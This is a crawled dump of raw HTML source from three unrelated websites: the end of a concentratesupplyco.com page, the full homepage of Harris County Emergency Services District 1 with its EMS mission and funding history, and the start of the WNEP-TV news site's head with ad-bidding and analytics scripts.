src='https://concentratesupplyco.com/wp-content/themes/enfold/js/avia-snippet-lightbox.js?ver=4.5.7'></script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-content/themes/enfold/js/avia-snippet-megamenu.js?ver=4.5.7'></script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-content/themes/enfold/js/avia-snippet-sticky-header.js?ver=4.5.7'></script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-content/themes/enfold/js/avia-snippet-widget.js?ver=4.5.7'></script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=5.2'></script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-content/themes/enfold/framework/js/conditional_load/avia_google_maps_front.js?ver=4.5.7'></script> <script type='text/javascript' src='https://concentratesupplyco.com/wp-includes/js/wp-embed.min.js?ver=5.2'></script> <script> if(document.cookie.match(/aviaPrivacyGoogleTrackingDisabled/)){ window['ga-disable-UA-108063304-1'] = true; } </script><!-- Global site tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-108063304-1"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-108063304-1'); </script> </body> </html>
0
<!DOCTYPE html> <html lang="en-US" xmlns="http://www.w3.org/1999/html"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="http://gmpg.org/xfn/11"> <link rel="pingback" href="http://www.hcesd-1.org/xmlrpc.php"> <title>Harris County Emergency Services District 1 &#8211; To be the leaders of our profession and provide the citizens of North Harris County with the most advanced pre-hospital care through Mobile Intensive Care Units staffed with the leading team of caring and dedicated emergency medical professionals.</title> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Harris County Emergency Services District 1 &raquo; Feed" href="http://www.hcesd-1.org/feed/" /> <link rel="alternate" type="application/rss+xml" title="Harris County Emergency Services District 1 &raquo; Comments Feed" href="http://www.hcesd-1.org/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.hcesd-1.org\/wp-includes\/js\/wp-emoji-release.min.js?ver=9cc3161596ecf03750588668a5da9186"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='http://www.hcesd-1.org/wp-includes/css/dist/block-library/style.min.css?ver=9cc3161596ecf03750588668a5da9186' type='text/css' media='all' /> <link rel='stylesheet' id='contact-form-7-css' href='http://www.hcesd-1.org/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.3' type='text/css' media='all' /> <link rel='stylesheet' id='courtyard-fonts-css' href='https://fonts.googleapis.com/css?family=Courgette%7CRoboto%3A300%2C400%2C500%2C700&#038;subset=latin%2Clatin-ext' type='text/css' media='all' /> <link rel='stylesheet' id='bootstrap-css' href='http://www.hcesd-1.org/wp-content/themes/courtyard/css/bootstrap.optimized.min.css?ver=3.3.7' type='text/css' media='' /> <link rel='stylesheet' id='animate-css' href='http://www.hcesd-1.org/wp-content/themes/courtyard/css/animate.min.css?ver=3.5.1' type='text/css' media='' /> <link rel='stylesheet' id='font-awesome-css' href='http://www.hcesd-1.org/wp-content/themes/courtyard/css/font-awesome.min.css?ver=4.7.0' type='text/css' media='' /> <link rel='stylesheet' id='elegant-font-css' href='http://www.hcesd-1.org/wp-content/themes/courtyard/css/elegant-font.custom.css?ver=9cc3161596ecf03750588668a5da9186' type='text/css' media='' /> <link rel='stylesheet' id='swiper-css' href='http://www.hcesd-1.org/wp-content/themes/courtyard/css/swiper.min.css?ver=3.4.0' type='text/css' media='' /> <link rel='stylesheet' id='courtyard-style-css' href='http://www.hcesd-1.org/wp-content/themes/courtyard/style.css?ver=9cc3161596ecf03750588668a5da9186' type='text/css' media='all' /> <link rel='stylesheet' id='wpcw-css' href='http://www.hcesd-1.org/wp-content/plugins/contact-widgets/assets/css/style.min.css?ver=1.0.1' type='text/css' media='all' /> <script type='text/javascript' src='http://www.hcesd-1.org/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='http://www.hcesd-1.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <link rel='https://api.w.org/' href='http://www.hcesd-1.org/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.hcesd-1.org/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.hcesd-1.org/wp-includes/wlwmanifest.xml" /> <link rel="canonical" href="http://www.hcesd-1.org/" /> <link rel='shortlink' href='http://www.hcesd-1.org/' /> <link rel="alternate" type="application/json+oembed" href="http://www.hcesd-1.org/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.hcesd-1.org%2F" /> <link rel="alternate" type="text/xml+oembed" href="http://www.hcesd-1.org/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.hcesd-1.org%2F&#038;format=xml" /> <script type="text/javascript"> (function(url){ if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; } var addEvent = function(evt, handler) { if (window.addEventListener) { document.addEventListener(evt, handler, false); } else if (window.attachEvent) { document.attachEvent('on' + evt, handler); } }; var removeEvent = function(evt, handler) { if (window.removeEventListener) { document.removeEventListener(evt, handler, false); } else if (window.detachEvent) { document.detachEvent('on' + evt, handler); } }; var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' '); var logHuman = function() { if (window.wfLogHumanRan) { return; } window.wfLogHumanRan = true; var wfscr = document.createElement('script'); wfscr.type = 'text/javascript'; wfscr.async = true; wfscr.src = url + '&r=' + Math.random(); (document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr); for (var i = 0; i < evts.length; i++) { removeEvent(evts[i], logHuman); } }; for (var i = 0; i < evts.length; i++) { addEvent(evts[i], logHuman); } })('//www.hcesd-1.org/?wordfence_lh=1&hid=CFE4A52B2431FF1503995C32E05FC059'); </script><!-- Harris County Emergency Services District 1 Internal Styles --> <style type="text/css">a, a:visited, .pt-logo .site-title a, .pt-menu li:hover > a, .pt-menu li.current-menu-item a, .pt-home-navbar li.current-menu-item a, .pt-home-navbar .pt-menu li li:hover > a, .pt-service-col .fa,.pt-hero-image-cont h1 a:hover, .pt-service-col h3:hover a, .pt-room-cont h3:hover a, .pt-recent-posts-col:hover h3 a, .pt-more-arrow a:hover, .pt-read-more a:hover, .pt-read-more a:hover, .pt-more-arrow .pt-arrow-left:hover, .pt-more-arrow .pt-arrow-right:hover, .pt-room-cont:hover h3 a, .pt-recent-posts-col:hover h3 a, .pt-read-more a:hover, .entry-meta .posted-on a, .entry-meta .byline a, .entry-footer .edit-link a, .comments-area .comment-list a, .comment-respond .logged-in-as a, .pt-breadcrumbs .trail-items .trail-item a, .pt-footer-wrapper li a:hover, footer.site-footer a:hover, .pt-content-wrap .entry-title a:hover, .pt-content-wrap span.posted-on a:hover, .pt-content-wrap span.byline a:hover, .pt-content-wrap span.cat-links a:hover, .pt-content-wrap span.tags-links a:hover, .post-navigation .nav-links a:hover, .pt-breadcrumbs-items li a:hover, #secondary li a:hover, .pt-menu-sm:hover, .page-template-template-services .pt-service-icon, #footer-widgets .pt-recent-posts-section h3 a:hover, .woocommerce ul.products li.product .woocommerce-loop-category__title:hover, .woocommerce ul.products li.product .woocommerce-loop-product__title:hover, .woocommerce ul.products li.product h3:hover, .woocommerce div.product .woocommerce-review-link:hover, .woocommerce div.product .product_meta a:hover, .woocommerce ul.products li.product .button { color: #e74c3c} a:hover, a:focus, a:active, .pt-logo .site-title:hover a, .pt-service-col .fa:hover { color: #c92e1e} .pt-hero-image-cont article a:hover, .pt-hero-slider-nav .pt-arrow-left:hover, .pt-hero-slider-nav .pt-arrow-right:hover, .pt-hero-image-slider .pt-arrow-down:hover, .pt-room-col:hover p:before, .pt-read-more a:before, .pt-read-more:hover a:before, #back-to-top, #back-to-top a, .pt-room-col:hover p:before, .pt-room-cont .pt-arrow-right, .pt-holiday-package-read-more:hover, .pt-recent-posts-col .pt-blog-post-more-icon, button:hover, input[type='button']:hover, input[type='reset']:hover, input[type='submit']:hover, .pt-content-wrap .read-more a:hover, .pt-pagination-nav a:hover, .pt-pagination-nav .current:hover, .pt-pagination-nav .current, .page-links a:hover, .tagcloud a:hover, .pt-social-icons-sec li:hover, .pt-cart-sm .pt-cart-value, .pt-menu .pt-cart .pt-cart-value, .woocommerce ul.products li.product .button:hover, .woocommerce span.onsale, .woocommerce div.product form.cart .button:hover, .woocommerce #respond input#submit.alt, .woocommerce a.button.alt, .woocommerce button.button.alt, .woocommerce input.button.alt { background-color: #e74c3c} button:focus, input[type='button']:focus, input[type='reset']:focus, input[type='submit']:focus, button:active, input[type='button']:active, input[type='reset']:active, input[type='submit']:active, .woocommerce #respond input#submit.alt:hover, .woocommerce a.button.alt:hover, .woocommerce button.button.alt:hover, .woocommerce input.button.alt:hover { background-color: #c92e1e} input[type='text']:focus, input[type='email']:focus, input[type='url']:focus, input[type='password']:focus, input[type='search']:focus, input[type='number']:focus, input[type='tel']:focus, input[type='range']:focus, input[type='date']:focus, input[type='month']:focus, input[type='week']:focus, input[type='time']:focus, input[type='datetime']:focus, input[type='datetime-local']:focus, input[type='color']:focus, textarea:focus, .woocommerce ul.products li.product .button { border-color: #e74c3c} </style> <style type="text/css" id="custom-background-css"> body.custom-background { background-color: #000000; } </style> </head> <body class="home page-template-default page page-id-156 custom-background"> <div id="page" class="site"> <header class="pt-header"> <div class="pt-navbar transition5 pt-home-navbar"> <div class="container"> <div class="row"> <div class="col-md-4 col-sm-8 col-xs-9"> <div class="pt-logo pt-front-page-logo transition5"> <h1> <span class="site-title screen-reader-text"> <a class="transition35" href="http://www.hcesd-1.org/" rel="home"> Harris County Emergency Services District 1 </a> </span> </h1> </div><!-- .pt-logo --> </div><!-- .col-md-4 --> <div class="col-md-8 col-sm-4 col-xs-3"> <nav class="pt-menu-wrap transition5"> <div class="pt-menu-sm transition35"> <i class="fa fa-bars"></i> <nav class="pt-menu-sm-wrap transition5"> <i class="fa fa-close"></i> <div class="menu-primary-menu-container"><ul id="primary-menu" class="menu"><li id="menu-item-170" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-156 current_page_item menu-item-170"><a href="http://www.hcesd-1.org/" aria-current="page">Home</a></li> <li id="menu-item-708" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-708"><a href="http://www.hcesd-1.org/commissioners/">Commissioners</a></li> <li id="menu-item-359" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-359"><a href="http://www.hcesd-1.org/public-information-open-records/">Public Information &#038; Open Records</a></li> <li id="menu-item-337" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-337"><a href="http://www.hcesd-1.org/links/">Links</a></li> <li id="menu-item-171" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-171"><a href="http://www.hcesd-1.org/contact/">Contact Us</a></li> </ul></div> </nav> </div> <div class="pt-menu"> <div class="menu-primary-menu-container"><ul id="primary-menu" class="menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-156 current_page_item menu-item-170"><a href="http://www.hcesd-1.org/" aria-current="page">Home</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-708"><a href="http://www.hcesd-1.org/commissioners/">Commissioners</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-359"><a href="http://www.hcesd-1.org/public-information-open-records/">Public Information &#038; Open Records</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-337"><a href="http://www.hcesd-1.org/links/">Links</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-171"><a href="http://www.hcesd-1.org/contact/">Contact Us</a></li> </ul></div> </div><!-- .pt-menu --> </nav><!-- .pt-menu-wrap --> </div><!-- .col-md-8 --> </div><!-- .row --> </div><!-- .container --> </div> <div class="pt-header-sep pt-header-sep-hide transition5"></div> <div id="wp-custom-header" class="wp-custom-header"><a href="http://www.hcesd-1.org/" title="Harris County Emergency Services District 1" rel="home"><div class="header-image-wrap"><img src="http://www.hcesd-1.org/wp-content/uploads/2017/07/cropped-cropped-header-e1501526804154.jpg" class="header-image" width="1920" height="478" alt="Harris County Emergency Services District 1"></div></a></div> </header> <div class="container"> <div class="row"> <div id="primary" class="pt-primary-wrap col-md-8"> <article id="post-156" class="pt-post-wrap post-156 page type-page status-publish hentry"> <div class="pt-content-wrap pt-content-wrap-border"> <header class="entry-header"> <h1 class="entry-title pt-single-post-title">Home</h1> </header><!-- .entry-header --> <div class="entry-content"> <p>&nbsp;</p> <h3><a href="http://www.hcec.com" target="_blank" rel="noopener">Welcome to Harris County Emergency Services District 1</a></h3> <p><strong>The Mission:</strong> To be the leaders of our profession and provide the citizens of North Harris County with the most advanced pre-hospital care through Mobile Intensive Care Units staffed with the leading team of caring and dedicated emergency medical professionals.</p> <p>In 1991 Harris County Emergency Services was formed through a majority vote of the property owners within its district. This was done to ensure that adequate funding was available for EMS within the proposed service area. Taxpayers voluntarily approved a 10 cent per one hundred dollar tax on their property to properly fund the service.</p> <p><a href="http://www.hcec.com" target="_blank" rel="noopener">Harris County Emergency Corps (HCESD #1 EMS Provider)</a></p> </div><!-- .entry-content --> </div> </article><!-- #post-## --> </div><!-- #primary --> <div class="col-md-4 "> <aside id="secondary" role="complementary"> <aside id="search-2" class="widget widget_search"><form role="search" method="get" class="search-form" action="http://www.hcesd-1.org/"> <label> <span class="screen-reader-text">Search for:</span> <input type="search" class="search-field" placeholder="Search &hellip;" value="" name="s" /> </label> <input type="submit" class="search-submit" value="Search" /> </form></aside><aside id="archives-2" class="widget widget_archive"><h4 class="widget-title">Archives</h4> <ul> </ul> </aside></aside><!-- #secondary --> </div> </div><!-- .row --> </div><!-- .container --> <div class="pt-footer-wrapper"> <div id="footer-widgets" class="footer-widgets" role="complementary"> <div class="container"> <div class="row"> <div class="sidebar-column col-md-12"> </div> </div><!-- .container --> </div><!-- .row --> </div><!-- #secondary --> <footer id="colophon" class="site-footer" role="contentinfo"> <div class="container"> <div class="row"> <div class="site-info"> Copyright &copy; 2019 <a href="http://www.hcesd-1.org/">Harris County Emergency Services District 1</a>. All rights reserved.<span class="sep"> | </span>Designed by <a href="http://precisethemes.com/" rel="designer" target="_blank">Precise Themes</a> </div><!-- .site-info --> </div><!-- .container --> </div><!-- .row --> </footer><!-- #colophon --> </div> <script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"http:\/\/www.hcesd-1.org\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"recaptcha":{"messages":{"empty":"Please verify that you are not a robot."}}}; /* ]]> */ </script> <script type='text/javascript' src='http://www.hcesd-1.org/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.3'></script> <script type='text/javascript' src='http://www.hcesd-1.org/wp-content/themes/courtyard/js/swiper.min.js?ver=4.3.3'></script> <script type='text/javascript' src='http://www.hcesd-1.org/wp-content/themes/courtyard/js/custom.min.js?ver=1.3.5'></script> <script type='text/javascript' src='http://www.hcesd-1.org/wp-content/themes/courtyard/js/navigation.js?ver=20151215'></script> <script type='text/javascript' src='http://www.hcesd-1.org/wp-content/themes/courtyard/js/skip-link-focus-fix.js?ver=20151215'></script> <script type='text/javascript' src='http://www.hcesd-1.org/wp-includes/js/wp-embed.min.js?ver=9cc3161596ecf03750588668a5da9186'></script> <span id="back-to-top" class="transition5"> <span class="back-to-top-text transition5"> Back to Top </span> <a class="transition35"><i class="fa fa-angle-up"></i></a> </span><!-- #back-to-top --> </body> </html>
0
<!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]--> <!--[if IE 7]> <html class="no-js lt-ie9 lt-ie8"> <![endif]--> <!--[if IE 8]> <html class="no-js lt-ie9"> <![endif]--> <!--[if gt IE 8]><!--> <html lang="en"> <!--<![endif]--> <head> <meta charset="UTF-8"> <meta http-equiv="refresh" content="900;" /><meta name="apple-itunes-app" content="app-id=576449977"> <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"/> <title>WNEP.com | News, Weather &amp; Sports from WNEP-TV &#8212; Proud to Serve Northeastern and Central Pennsylvania</title> <link rel="profile" href="http://gmpg.org/xfn/11"> <link rel="pingback" href="https://wnep.com/xmlrpc.php"> <meta name="description" content="News, Weather &amp;amp; Sports from WNEP-TV -- Proud to Serve Northeastern and Central Pennsylvania" /> <meta name="keywords" content="app update, do not use, contests, sofia&#039;s spotlight, art of aging, mr. curiosity, podcasts, instagram, citrus bowl, fiesta bowl, rose bowl 2017, sixteen salutes, sharla&#039;s show &amp; tell, inside track, go joe, 16 to the rescue, weather blog, ryan&#039;s run, pets, exclusives" /><meta property="fb:pages" content="54696907755" /> <meta name="google-site-verification" content="GEWMe03uX6hX8v43Ve2pFUlxI6LoNbIRq_sevJRIrrA" /> <meta name="msvalidate.01" content="9CC50DB4C5614EA88B5CFA75E33AAB02" /> <script type="text/javascript"> var dataLayer = window.dataLayer = window.dataLayer || []; dataLayer.push( {"fireGTM":true,"propID":"UA-27023945-1"} ); </script> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer',"GTM-MJT7G2");</script> <link rel='dns-prefetch' href='//s2.wp.com' /> <link rel='dns-prefetch' href='//s1.wp.com' /> <link rel='dns-prefetch' href='//platform.twitter.com' /> <link rel='dns-prefetch' href='//r-login.wordpress.com' /> <link rel='dns-prefetch' href='//s0.wp.com' /> <link rel='dns-prefetch' href='//localtvwnep.wordpress.com' /> <link rel='dns-prefetch' href='//cdn2.trb.tv' /> <link rel='dns-prefetch' href='//unpkg.com' /> <link rel='dns-prefetch' href='//localtvwnep.files.wordpress.com' /> <link rel="alternate" type="application/rss+xml" title="WNEP.com &raquo; Feed" href="https://wnep.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="WNEP.com &raquo; Comments Feed" href="https://wnep.com/comments/feed/" /> <script> window._acmDebug = window._acmDebug || []; </script> <script type="text/javascript"> /* <![CDATA[ */ function addLoadEvent(func) { var oldonload = window.onload; if (typeof window.onload != 'function') { window.onload = func; } else { window.onload = function () { oldonload(); func(); } } } /* ]]> */ </script> <link rel="canonical" href="https://wnep.com/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s0.wp.com\/wp-content\/mu-plugins\/wpcom-smileys\/twemoji\/2\/72x72\/","ext":".png","svgUrl":"https:\/\/s0.wp.com\/wp-content\/mu-plugins\/wpcom-smileys\/twemoji\/2\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/s1.wp.com\/wp-includes\/js\/wp-emoji-release.min.js?m=1556893897h&ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='all-css-0-1' href='https://s1.wp.com/_static/??-eJyNUFuOwjAMvBDBvPlacZY0tVJDXordFm6PaXclJMSqf2N7xjM2jMVQcqFvkcExQ0ss0ITsbiZQU219AMsj4DpSWithBapwOQkmgdibEnpPiWGk1qPMO2ZsBO/ynySWk7ZjsTLBzrobf/Clw6jRBiqgoWyQwewmkyZnYam2LJdU5JIT04DLNKRTvQatTquZq+m+985y+zHhZ9i3f1TUv3uF/jftX/nNojuAD7mx4UW4xJ/t8XjeHbbn/eb6BGeLruQ=?cssminify=yes' type='text/css' media='all' /> <script type='text/javascript'> /* <![CDATA[ */ var PrebidTags = [{"code":"acm-tag-728x90-atf","mediaTypes":{"banner":{"sizes":[[970,250],[970,66],[970,90],[728,90]]}},"bids":[{"bidder":"appnexusAst","params":{"placementId":"11578401"}},{"bidder":"criteo","params":{"zoneId":"1141925"}},{"bidder":"ix","params":{"id":"512","siteId":"205825","size":[970,250]}},{"bidder":"openx","params":{"unit":"539153772","delDomain":"tribunemedia-d.openx.net"}},{"bidder":"rubicon","params":{"accountId":"10043","siteId":"145054","zoneId":"680340"}}]},{"code":"acm-tag-728x90-btf","mediaTypes":{"banner":{"sizes":[[970,250],[970,66],[728,90]]}},"bids":[{"bidder":"appnexusAst","params":{"placementId":"11578402"}},{"bidder":"criteo","params":{"zoneId":"1141927"}},{"bidder":"ix","params":{"id":"513","siteId":"205827","size":[970,250]}},{"bidder":"openx","params":{"unit":"539153773","delDomain":"tribunemedia-d.openx.net"}},{"bidder":"rubicon","params":{"accountId":"10043","siteId":"145054","zoneId":"680342"}}]},{"code":"acm-tag-300x250-atf","mediaTypes":{"banner":{"sizes":[[300,250]]}},"bids":[{"bidder":"appnexusAst","params":{"placementId":"11578395"}},{"bidder":"criteo","params":{"zoneId":"1141898"}},{"bidder":"ix","params":{"id":"505","siteId":"205818","size":[300,250]}},{"bidder":"openx","params":{"unit":"539153765","delDomain":"tribunemedia-d.openx.net"}},{"bidder":"rubicon","params":{"accountId":"10043","siteId":"145054","zoneId":"680326"}}]},{"code":"acm-tag-300x250-btf0","mediaTypes":{"banner":{"sizes":[[728,90],[300,250]]}},"bids":[{"bidder":"appnexusAst","params":{"placementId":"11578397"}},{"bidder":"criteo","params":{"zoneId":"1141899"}},{"bidder":"ix","params":{"id":"507","siteId":"205820","size":[728,90]}},{"bidder":"openx","params":{"unit":"539153767","delDomain":"tribunemedia-d.openx.net"}},{"bidder":"rubicon","params":{"accountId":"10043","siteId":"145054","zoneId":"680330"}}]},{"code":"acm-tag-300x250-btf","mediaTypes":{"banner":{"sizes":[[300,250]]}},"bids":[{"bidder":"appnexusAst","params":{"placementId":"11578397"}},{"bidder":"criteo","params":{"zoneId":"1141899"}},{"bidder":"ix","params":{"id":"507","siteId":"205820","size":[300,250]}},{"bidder":"openx","params":{"unit":"539153767","delDomain":"tribunemedia-d.openx.net"}},{"bidder":"rubicon","params":{"accountId":"10043","siteId":"145054","zoneId":"680330"}}]},{"code":"acm-tag-300x250-btf1","mediaTypes":{"banner":{"sizes":[[300,250]]}},"bids":[{"bidder":"appnexusAst","params":{"placementId":"11578398"}},{"bidder":"criteo","params":{"zoneId":"1141900"}},{"bidder":"ix","params":{"id":"508","siteId":"205821","size":[300,250]}},{"bidder":"openx","params":{"unit":"539153768","delDomain":"tribunemedia-d.openx.net"}},{"bidder":"rubicon","params":{"accountId":"10043","siteId":"145054","zoneId":"680332"}}]},{"code":"acm-tag-300x250-btf2","mediaTypes":{"banner":{"sizes":[[300,250]]}},"bids":[{"bidder":"appnexusAst","params":{"placementId":"11578399"}},{"bidder":"criteo","params":{"zoneId":"1141901"}},{"bidder":"ix","params":{"id":"509","siteId":"205822","size":[300,250]}},{"bidder":"openx","params":{"unit":"539153769","delDomain":"tribunemedia-d.openx.net"}},{"bidder":"rubicon","params":{"accountId":"10043","siteId":"145054","zoneId":"680334"}}]},{"code":"acm-tag-300x250-btf3","mediaTypes":{"banner":{"sizes":[[300,250]]}},"bids":[{"bidder":"appnexusAst","params":{"placementId":"11578400"}},{"bidder":"criteo","params":{"zoneId":"1141902"}},{"bidder":"ix","params":{"id":"510","siteId":"205823","size":[300,250]}},{"bidder":"openx","params":{"unit":"539153770","delDomain":"tribunemedia-d.openx.net"}},{"bidder":"rubicon","params":{"accountId":"10043","siteId":"145054","zoneId":"680336"}}]},{"code":"acm-tag-300x250-mid","mediaTypes":{"banner":{"sizes":[[300,250],[300,600]]}},"bids":[{"bidder":"appnexusAst","params":{"placementId":"11578396"}},{"bidder":"criteo","params":{"zoneId":"1141904"}},{"bidder":"ix","params":{"id":"506","siteId":"205819","size":[300,250]}},{"bidder":"openx","params":{"unit":"539153766","delDomain":"tribunemedia-d.openx.net"}},{"bidder":"rubicon","params":{"accountId":"10043","siteId":"145054","zoneId":"680328"}}]},{"code":"acm-tag-300x250-intext","mediaTypes":{"banner":{"sizes":[[300,250]]}},"bids":[]},{"code":"acm-tag-oop","mediaTypes":{"banner":{"sizes":[[1,1]]}},"bids":[]}]; var A9Slots = 